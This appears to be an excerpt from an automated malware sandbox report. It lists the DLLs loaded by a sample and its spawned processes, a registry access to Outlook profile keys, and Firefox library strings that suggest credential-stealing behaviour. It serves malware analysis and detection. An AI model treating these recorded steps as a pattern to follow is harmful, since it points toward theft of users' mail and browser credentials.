Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942647828.00000173F45F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: mozglue.pdb source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938719141.00000173F2420000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
